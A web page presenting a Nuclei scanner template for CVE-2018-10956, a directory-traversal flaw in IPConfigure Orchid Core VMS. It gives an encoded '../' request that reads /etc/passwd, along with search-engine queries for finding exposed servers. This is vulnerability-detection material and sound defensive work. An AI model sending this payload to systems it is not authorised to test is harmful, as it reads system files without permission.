Skip to content

IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion

ID: CVE-2018-10956

Severity: high

Author: 0x_Akoko

Tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure

IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.

id: CVE-2018-10956
info:
name: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.
impact: |
An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
remediation: |
Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability.
reference:
- https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/
- https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb
- https://www.exploit-db.com/exploits/44916/
- https://nvd.nist.gov/vuln/detail/CVE-2018-10956
- https://github.com/xbl3/awesome-cve-poc_qazbnm456
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-10956
cwe-id: CWE-22
epss-score: 0.54195
epss-percentile: 0.97627
cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: ipconfigure
product: orchid_core_vms
shodan-query:
- http.title:"Orchid Core VMS"
- http.title:"orchid core vms"
fofa-query: title="orchid core vms"
google-query: intitle:"orchid core vms"
tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure
http:
- method: GET
path:
- "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a0047304502205264e469dd7abbfeaabd33f6d90d82849dafdd7097b45efba63fc3d4b7b09ca5022100d9dcf98f1e00a6553b4cc2fe8c2104070ba2fe12ecad5989bc7a7dc9d95947b0:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-10956.yaml"

View on Github